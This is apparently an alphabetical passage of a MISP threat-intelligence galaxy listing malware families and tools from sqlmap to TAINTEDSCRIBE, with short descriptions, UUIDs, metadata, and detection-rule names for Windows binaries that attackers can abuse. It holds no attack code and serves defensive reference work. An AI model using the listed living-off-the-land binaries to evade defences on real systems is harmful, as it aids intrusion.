Internal MISP references
UUID 96c224a6-6ca4-4ac1-9990-d863ec5a317a
which can be used as unique global reference for sqlmap
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0225 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Sqlps
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\100 and 110 are Powershell v2. Microsoft SQL Server\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.
Author: Oddvar Moe
Paths: * C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\120\Tools\Binn\sqlps.exe * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe * C:\Program Files (x86)\Microsoft SQL Server\150\Tools\Binn\SQLPS.exe
Resources: * https://twitter.com/ManuelBerrueta/status/1527289261350760455 * https://twitter.com/bryon_/status/975835709587075072 * https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection: * Sigma: proc_creation_win_mssql_sqlps_susp_execution.yml * Sigma: image_load_dll_system_management_automation_susp_load.yml * Elastic: execution_suspicious_powershell_imgload.toml * Splunk: 2021-10-05-suspicious_copy_on_system32.md[Sqlps.exe - LOLBAS Project]
Internal MISP references
UUID 5b3c03d3-9ea1-4322-a422-ab2401ffc294
which can be used as unique global reference for Sqlps
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5236 |
source | Tidal Cyber |
tags | ['da7e88fd-2d71-4928-81ce-e3d455b3d418', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SQLRat
SQLRat is malware that executes SQL scripts to avoid leaving traditional host artifacts. FIN7 has been observed using it.[Flashpoint FIN 7 March 2019]
Internal MISP references
UUID 612f780a-239a-4bd0-a29f-63beadf3ed22
which can be used as unique global reference for SQLRat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0390 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SQLToolsPS
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.
Author: Oddvar Moe
Paths: * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
Resources: * https://twitter.com/pabraeken/status/993298228840992768 * https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017
Detection: * Sigma: proc_creation_win_mssql_sqltoolsps_susp_execution.yml * Splunk: 2021-10-05-suspicious_copy_on_system32.md[SQLToolsPS.exe - LOLBAS Project]
Internal MISP references
UUID 9271e5cf-f788-4d7d-9c7a-8d5e37cbb9a6
which can be used as unique global reference for SQLToolsPS
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5237 |
source | Tidal Cyber |
tags | ['f4867256-402a-4bcb-97d3-e071ee0993c1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Squirrel
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.
Author: Reegun J (OCBC Bank) - @reegun21
Paths: * %localappdata%\Microsoft\Teams\current\Squirrel.exe
Resources: * https://www.youtube.com/watch?v=rOP3hnkj7ls * https://twitter.com/reegun21/status/1144182772623269889 * http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/ * https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12 * https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56
Detection: * Sigma: proc_creation_win_lolbin_squirrel.yml[Squirrel.exe - LOLBAS Project]
Internal MISP references
UUID 13d5d060-8462-4592-8efb-2243fd2138d1
which can be used as unique global reference for Squirrel
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5238 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Squirrelwaffle
Squirrelwaffle is a loader that was first seen in September 2021. It has been used in spam email campaigns to deliver additional malware such as Cobalt Strike and the QakBot banking trojan.[ZScaler Squirrelwaffle Sep 2021][Netskope Squirrelwaffle Oct 2021]
Internal MISP references
UUID 46943a69-0b19-4d3a-b2a3-1302e85239a3
which can be used as unique global reference for Squirrelwaffle
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1030 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
ssh
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Ssh.exe is the OpenSSH compatible client can be used to connect to Windows 10 (build 1809 and later) and Windows Server 2019 devices.
Author: Akshat Pradhan
Paths: * c:\windows\system32\OpenSSH\ssh.exe
Resources: * https://gtfobins.github.io/gtfobins/ssh/
Detection: * Sigma: proc_creation_win_lolbin_ssh.yml * IOC: Event ID 4624 with process name C:\Windows\System32\OpenSSH\sshd.exe. * IOC: command line arguments specifying execution.[ssh.exe - LOLBAS Project]
Internal MISP references
UUID 7b607493-5035-4e29-9f95-55362f53b805
which can be used as unique global reference for ssh
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5164 |
source | Tidal Cyber |
tags | ['6070668f-1cbd-4878-8066-c636d1d8659c', 'd8f7e071-fbfd-46f8-b431-e241bb1513ac', '64a55f86-15db-4599-b165-81be7f024397', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SslMM
SslMM is a full-featured backdoor used by Naikon that has multiple variants. [Baumgartner Naikon 2015]
Internal MISP references
UUID 3334a124-3e74-4a90-8ed1-55eea3274b19
which can be used as unique global reference for SslMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0058 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Starloader
Starloader is a loader component that has been observed loading Felismus and associated tools. [Symantec Sowbug Nov 2017]
Internal MISP references
UUID fc18e220-2200-4d70-a426-0700ba14c4c0
which can be used as unique global reference for Starloader
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0188 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
STARWHALE
STARWHALE is Windows Script File (WSF) backdoor that has been used by MuddyWater, possibly since at least November 2021; there is also a STARWHALE variant written in Golang with similar capabilities. Security researchers have also noted the use of STARWHALE by UNC3313, which may be associated with MuddyWater.[Mandiant UNC3313 Feb 2022][DHS CISA AA22-055A MuddyWater February 2022]
Internal MISP references
UUID 764c6121-2d15-4a10-ac53-b1c431dc8b47
which can be used as unique global reference for STARWHALE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1037 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
STEADYPULSE
STEADYPULSE is a web shell that infects targeted Pulse Secure VPN servers through modification of a legitimate Perl script that was used as early as 2020 including in activity against US Defense Industrial Base (DIB) entities.[Mandiant Pulse Secure Zero-Day April 2021]
Internal MISP references
UUID ea561f0b-b891-5735-aa99-97cc8818fbef
which can be used as unique global reference for STEADYPULSE
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S1112 |
source | MITRE |
type | ['malware'] |
Stealc
Stealc is a credential and information stealer first discovered by researchers in January 2023. Researchers assess the malware contains code similarities to prominent stealer families including Vidar, Raccoon, Mars, and RedLine.[Sekoia.io Stealc February 20 2023] Red Canary researchers indicated in July 2023 that they observed a "surge" of Stealc activity during the second half of the preceding month.[Red Canary Intelligence Insights July 20 2023]
Internal MISP references
UUID 7ae6b9f0-3a50-4ebc-ae2c-9569f00dbd81
which can be used as unique global reference for Stealc
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5298 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
STEALDEAL
STEALDEAL is a relatively simple information and credential stealer that is known to be downloaded by RomCom malware and used to collect and exfiltrate victim data, including locally stored web browser credentials, cookies, and history.[Trend Micro Void Rabisu May 30 2023]
Internal MISP references
UUID 39aaa970-8c33-4fd3-a7f0-4b769f301460
which can be used as unique global reference for STEALDEAL
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5296 |
source | Tidal Cyber |
tags | ['c6e1f516-1a18-4ff9-b563-e6ac8103b104', '4d767e87-4cf6-438a-927a-43d2d0beaab7', '2feda37d-5579-4102-a073-aa02e82cb49f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
StoneDrill
StoneDrill is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with APT33.[FireEye APT33 Sept 2017][Kaspersky StoneDrill 2017]
Internal MISP references
UUID 9eee52a2-5ac1-4561-826c-23ec7fbc7876
which can be used as unique global reference for StoneDrill
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0380 |
source | MITRE |
tags | ['2e621fc5-dea4-4cb9-987e-305845986cd3'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Stordiag
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Storage diagnostic tool
Author: Eral4m
Paths: * c:\windows\system32\stordiag.exe * c:\windows\syswow64\stordiag.exe
Resources: * https://twitter.com/eral4m/status/1451112385041911809
Detection: * Sigma: proc_creation_win_stordiag_susp_child_process.yml * IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\[Stordiag.exe - LOLBAS Project]
Internal MISP references
UUID 7430c53f-41a0-4395-88c7-fc2c34ee52c7
which can be used as unique global reference for Stordiag
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5165 |
source | Tidal Cyber |
tags | ['f0e3d6ea-d7ea-4d73-b868-1076fac744a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
StreamEx
StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites. [Cylance Shell Crew Feb 2017]
Internal MISP references
UUID 502b490c-2067-40a4-8f73-7245d7910851
which can be used as unique global reference for StreamEx
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0142 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrifeWater
StrifeWater is a remote-access tool that has been used by Moses Staff in the initial stages of their attacks since at least November 2021.[Cybereason StrifeWater Feb 2022]
Internal MISP references
UUID dd8bb0a3-6cb1-412d-adeb-cbaae98462a9
which can be used as unique global reference for StrifeWater
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1034 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
StrongPity
StrongPity is an information stealing malware used by PROMETHIUM.[Bitdefender StrongPity June 2020][Talos Promethium June 2020]
Internal MISP references
UUID ed563524-235e-4e06-8c69-3f9d8ddbfd8a
which can be used as unique global reference for StrongPity
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0491 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Stuxnet
Stuxnet was the first publicly reported piece of malware to specifically target industrial control systems devices. Stuxnet is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011][CISA ICS Advisory ICSA-10-272-01][ESET Stuxnet Under the Microscope][Langer Stuxnet] Stuxnet was discovered in 2010, with some components being used as early as November 2008.[Nicolas Falliere, Liam O Murchu, Eric Chien February 2011]
Internal MISP references
UUID 3fdf3833-fca9-4414-8d2e-779dabc4ee31
which can be used as unique global reference for Stuxnet
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0603 |
source | MITRE |
tags | ['3ed3f7a6-b446-4fbc-a433-ff1d63c0e647', 'a98d7a43-f227-478e-81de-e7299639a355'] |
type | ['malware'] |
S-Type
S-Type is a backdoor that was used in Operation Dust Storm since at least 2013.[Cylance Dust Storm]
Internal MISP references
UUID b19b6c38-d38b-46f2-a535-d0bfc5790368
which can be used as unique global reference for S-Type
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0085 |
source | MITRE |
type | ['malware'] |
SUGARDUMP
SUGARDUMP is a proprietary browser credential harvesting tool that was used by UNC3890 during the C0010 campaign. The first known SUGARDUMP version was used since at least early 2021, a second SMTP C2 version was used from late 2021-early 2022, and a third HTTP C2 variant was used since at least April 2022.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 6ff7bf2e-286c-4b1b-92a0-1e5322870c59
which can be used as unique global reference for SUGARDUMP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1042 |
source | MITRE |
type | ['malware'] |
SUGARUSH
SUGARUSH is a small custom backdoor that can establish a reverse shell over TCP to a hard coded C2 address. SUGARUSH was first identified during analysis of UNC3890's C0010 campaign targeting Israeli companies, which began in late 2020.[Mandiant UNC3890 Aug 2022]
Internal MISP references
UUID 004c781a-3d7d-446b-9677-a042c8f6566e
which can be used as unique global reference for SUGARUSH
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1049 |
source | MITRE |
type | ['malware'] |
SUNBURST
SUNBURST is a trojanized DLL designed to fit within the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[SolarWinds Sunburst Sunspot Update January 2021][Microsoft Deep Dive Solorigate January 2021]
Internal MISP references
UUID 6b04e98e-c541-4958-a8a5-d433e575ce78
which can be used as unique global reference for SUNBURST
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0559 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUNSPOT
SUNSPOT is an implant that injected the SUNBURST backdoor into the SolarWinds Orion software update framework. It was used by APT29 since at least February 2020.[CrowdStrike SUNSPOT Implant January 2021]
Internal MISP references
UUID 66966a12-3db3-4e43-a7e8-6c6836ccd8fe
which can be used as unique global reference for SUNSPOT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0562 |
source | MITRE |
tags | ['f2ae2283-f94d-4f8f-bbde-43f2bed66c55', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SUPERNOVA
SUPERNOVA is an in-memory web shell written in .NET C#. It was discovered in November 2020 during the investigation of APT29's SolarWinds cyber operation but determined to be unrelated. Subsequent analysis suggests SUPERNOVA may have been used by the China-based threat group SPIRAL.[Guidepoint SUPERNOVA Dec 2020][Unit42 SUPERNOVA Dec 2020][SolarWinds Advisory Dec 2020][CISA Supernova Jan 2021][Microsoft Analyzing Solorigate Dec 2020]
Internal MISP references
UUID f02abaee-237b-4891-bb5d-30ca86dfc2c8
which can be used as unique global reference for SUPERNOVA
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0578 |
source | MITRE |
type | ['malware'] |
SVCReady
SVCReady is a loader that has been used since at least April 2022 in malicious spam campaigns. Security researchers have noted overlaps between TA551 activity and SVCReady distribution, including similarities in file names, lure images, and identical grammatical errors.[HP SVCReady Jun 2022]
Internal MISP references
UUID a8110f81-5ee9-5819-91ce-3a57aa330dcb
which can be used as unique global reference for SVCReady
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1064 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Sykipot
Sykipot is malware that has been used in spearphishing campaigns since approximately 2007 against victims primarily in the US. One variant of Sykipot hijacks smart cards on victims. [Alienvault Sykipot DOD Smart Cards] The group using this malware has also been referred to as Sykipot. [Blasco 2013]
Internal MISP references
UUID ae749f9c-cf46-42ce-b0b8-f0be8660e3f3
which can be used as unique global reference for Sykipot
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0018 |
source | MITRE |
type | ['malware'] |
SynAck
SynAck is variant of Trojan ransomware targeting mainly English-speaking users since at least fall 2017. [SecureList SynAck Doppelgänging May 2018] [Kaspersky Lab SynAck May 2018]
Internal MISP references
UUID 19ae8345-745e-4872-8a29-d56c8800d626
which can be used as unique global reference for SynAck
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0242 |
source | MITRE |
tags | ['5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
type | ['malware'] |
Syncappvpublishingserver - Duplicate
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Script used related to app-v and publishing server
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.vbs
Resources: * https://twitter.com/monoxgas/status/895045566090010624 * https://twitter.com/subTee/status/855738126882316288
Detection: * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml[Syncappvpublishingserver.vbs - LOLBAS Project]
Internal MISP references
UUID 6af0eac2-c35f-4569-ae09-47f1ca846961
which can be used as unique global reference for Syncappvpublishingserver - Duplicate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5261 |
source | Tidal Cyber |
tags | ['9e504206-7a84-40a5-b896-8995d82e3586', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SyncAppvPublishingServer
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by App-v to get App-v server lists
Author: Oddvar Moe
Paths: * C:\Windows\System32\SyncAppvPublishingServer.exe * C:\Windows\SysWOW64\SyncAppvPublishingServer.exe
Resources: * https://twitter.com/monoxgas/status/895045566090010624
Detection: * Sigma: posh_ps_syncappvpublishingserver_exe.yml * Sigma: posh_pm_syncappvpublishingserver_exe.yml * Sigma: proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml * IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed[SyncAppvPublishingServer.exe - LOLBAS Project]
Internal MISP references
UUID f2928533-34e1-4599-a3ec-c8b4ef9d81b4
which can be used as unique global reference for SyncAppvPublishingServer
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5166 |
source | Tidal Cyber |
tags | ['acda137a-d1c9-4216-9c08-d07c8d899725', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SYNful Knock
SYNful Knock is a stealthy modification of the operating system of network devices that can be used to maintain persistence within a victim's network and provide new capabilities to the adversary.[Mandiant - Synful Knock][Cisco Synful Knock Evolution]
Internal MISP references
UUID 69ab291d-5066-4e47-9862-1f5c7bac7200
which can be used as unique global reference for SYNful Knock
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Network'] |
software_attack_id | S0519 |
source | MITRE |
tags | ['b20e7912-6a8d-46e3-8e13-9a3fc4813852'] |
type | ['malware'] |
Sys10
Sys10 is a backdoor that was used throughout 2013 by Naikon. [Baumgartner Naikon 2015]
Internal MISP references
UUID 2df35a92-2295-417a-af5a-ba5c943ef40d
which can be used as unique global reference for Sys10
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0060 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
SYSCON
SYSCON is a backdoor that has been in use since at least 2017 and has been associated with campaigns involving North Korean themes. SYSCON has been delivered by the CARROTBALL and CARROTBAT droppers.[Unit 42 CARROTBAT November 2018][Unit 42 CARROTBAT January 2020]
Internal MISP references
UUID ea556a8d-4959-423f-a2dd-622d0497d484
which can be used as unique global reference for SYSCON
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0464 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Syssetup
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows NT System Setup
Author: LOLBAS Team
Paths: * c:\windows\system32\syssetup.dll * c:\windows\syswow64\syssetup.dll
Resources: * https://twitter.com/pabraeken/status/994392481927258113 * https://twitter.com/harr0ey/status/975350238184697857 * https://twitter.com/bohops/status/975549525938135040 * https://windows10dll.nirsoft.net/syssetup_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml * Splunk: detect_rundll32_application_control_bypass___syssetup.yml[Syssetup.dll - LOLBAS Project]
Internal MISP references
UUID 5d220e4f-db5f-4523-8dc5-63a604f3964b
which can be used as unique global reference for Syssetup
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5199 |
source | Tidal Cyber |
tags | ['9105775d-bdcb-45cc-895d-6c7bbb3d30ce', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
SystemBC
SystemBC is a commodity backdoor malware used as a Tor proxy and remote access Trojan (RAT). It was used during the high-profile 2021 Colonial Pipeline DarkSide ransomware attack and has since been used as a persistence & lateral movement tool during other ransomware compromises, including intrusions involving Ryuk, Egregor, and Play.[BlackBerry SystemBC June 10 2021][Sophos SystemBC December 16 2020][WithSecure SystemBC May 10 2021][Trend Micro Play Ransomware September 06 2022] According to Mandiant's 2023 M-Trends report, SystemBC was the second most frequently seen malware family in 2022 after only Cobalt Strike Beacon.[TechRepublic M-Trends 2023]
Malpedia (Research): https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
Malware Bazaar (Samples & IOCs): https://bazaar.abuse.ch/browse/tag/systembc/
PulseDive (IOCs): https://pulsedive.com/threat/SystemBC
Internal MISP references
UUID c30929fb-28a1-407c-a1c3-a83374c63267
which can be used as unique global reference for SystemBC
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5058 |
source | Tidal Cyber |
tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Systeminfo
Systeminfo is a Windows utility that can be used to gather detailed information about a computer. [TechNet Systeminfo]
Internal MISP references
UUID cecea681-a753-47b5-9d77-c10a5b4403ab
which can be used as unique global reference for Systeminfo
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0096 |
source | MITRE |
tags | ['7b918200-2c8d-4b86-a81b-b2bdec5b2c2b', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
SysUpdate
SysUpdate is a backdoor written in C++ that has been used by Threat Group-3390 since at least 2020.[Trend Micro Iron Tiger April 2021]
Internal MISP references
UUID 148d587c-3b1e-4e71-bdfb-8c37005e7e77
which can be used as unique global reference for SysUpdate
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Linux', 'Windows'] |
software_attack_id | S0663 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
T9000
T9000 is a backdoor that is a newer variant of the T5000 malware family, also known as Plat1. Its primary function is to gather information about the victim. It has been used in multiple targeted attacks against U.S.-based organizations. [FireEye admin@338 March 2014] [Palo Alto T9000 Feb 2016]
Internal MISP references
UUID c5647cc4-0d46-4a41-8591-9179737747a2
which can be used as unique global reference for T9000
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0098 |
source | MITRE |
type | ['malware'] |
Tactical RMM
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tactical RMM is a publicly available, legitimate tool that "enables remote monitoring and management of systems". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID ba4777f9-bb3b-4143-8062-a510c30544ce
which can be used as unique global reference for Tactical RMM
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5066 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Taidoor
Taidoor is a remote access trojan (RAT) that has been used by Chinese government cyber actors to maintain access on victim networks.[CISA MAR-10292089-1.v2 TAIDOOR August 2021] Taidoor has primarily been used against Taiwanese government organizations since at least 2010.[TrendMicro Taidoor]
Internal MISP references
UUID 9334df79-9023-44bb-bc28-16c1f07b836b
which can be used as unique global reference for Taidoor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0011 |
source | MITRE |
type | ['malware'] |
Tailscale
According to joint Cybersecurity Advisory AA23-320A (November 2023), Tailscale is a publicly available, legitimate tool that "provides virtual private networks (VPNs) to secure network communications". According to the Advisory, Scattered Spider threat actors are known to abuse the tool during their intrusions.[U.S. CISA Scattered Spider November 16 2023]
Internal MISP references
UUID 130a5491-1b93-45fd-bd72-9e5f8ddeba2a
which can be used as unique global reference for Tailscale
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5069 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'e727eaa6-ef41-4965-b93a-8ad0c51d0236'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
TAINTEDSCRIBE
TAINTEDSCRIBE is a fully-featured beaconing implant integrated with command modules used by Lazarus Group. It was first reported in May 2020.[CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020]
Internal MISP references
UUID 1548c94a-fb4d-43d8-9956-ea26f5cc552f
